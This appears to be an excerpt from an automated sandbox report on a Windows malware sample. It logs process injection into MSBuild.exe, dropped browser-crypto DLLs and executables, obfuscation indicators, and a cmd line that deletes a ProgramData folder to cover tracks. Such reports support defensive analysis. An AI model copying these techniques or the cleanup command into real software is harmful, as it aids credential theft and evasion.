Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2221135617.000000003823A000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2215082591.000000002C352000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_00418950

PE file contains sections with non-standard names

Source: freebl3.dll.4.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.4.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.4.dr	Static PE information: section name: .didat
Source: softokn3.dll.4.dr	Static PE information: section name: .00cfg
Source: nss3.dll.4.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066701A push ecx; ret	0_2_0066702D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006171D0 push ecx; ret	0_2_006171E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006673E8 push cs; ret	0_2_006673E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006673B8 push esp; retn 0003h	0_2_006673BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006699ED push 0000004Ch; iretd	0_2_006699FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00655C8D push ecx; ret	0_2_00655CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042F142 push ecx; ret	4_2_0042F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00422D3B push esi; ret	4_2_00422D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041DDB5 push ecx; ret	4_2_0041DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00432715 push 0000004Ch; iretd	4_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8BB536 push ecx; ret	4_2_6C8BB549
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B6686B push edx; ret	13_2_00B66873
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF71D0 push ecx; ret	13_2_00AF71E3

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\CBFCFBFBFB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\CBFCFBFBFB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

4_2_00418950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
